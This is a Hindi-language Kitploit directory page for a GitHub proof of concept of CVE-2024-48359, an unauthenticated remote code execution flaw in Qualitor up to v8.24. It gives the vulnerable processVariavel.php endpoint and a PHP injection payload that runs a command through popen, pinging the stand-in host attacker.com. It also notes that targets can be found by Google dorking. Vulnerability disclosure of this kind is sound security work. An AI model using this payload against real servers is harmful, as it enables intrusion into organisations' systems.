Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-48359 — CVE-2024-48359 PoC | Kitploit
उपकरण/GitHubGitHub/openxp-research/cve-2024-48359
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubopenxp-research/cve-2024-48359

CVE-2024-48359

CVE-2024-48359 PoC

रिपॉजिटरी देखें
1161 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-48359 - Qualitor <= v8.24 बिना प्रमाणीकरण के RCE PoC

CVE-2024-48359 | Qualitor <= v8.24 RCE

विवरण

Qualitor व्यावसायिक प्रक्रिया प्रबंधन के लिए एक प्लेटफॉर्म है, और यह प्रणाली ब्राजील में विभिन्न कंपनियों में मौजूद है जिन्हें Google dorking का उपयोग करके आसानी से पहचाना जा सकता है।

हमारी टीम ने एप्लिकेशन में एक Remote Code Execution (RCE) के प्रति संवेदनशील कमजोरी की पहचान की, जो सिस्टम कमांड के रिमोट निष्पादन की अनुमति देती है।

यह CVE-2023-47253 फिक्स के लिए एक बाईपास है।

प्रूफ ऑफ कॉन्सेप्ट (POC)

बस processVariavel.php पेज पर एक PHP कोड भेजें, उदाहरण: /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=nl2br(stream_get_contents(popen('ping attacker.com', 'r')));

image

शोधकर्ता

https://www.linkedin.com/in/xvinicius/

https://www.linkedin.com/in/hairrison-wenning-4631a4124/

  • OpenXP अनुसंधान टीम
टूल डाउनलोड करें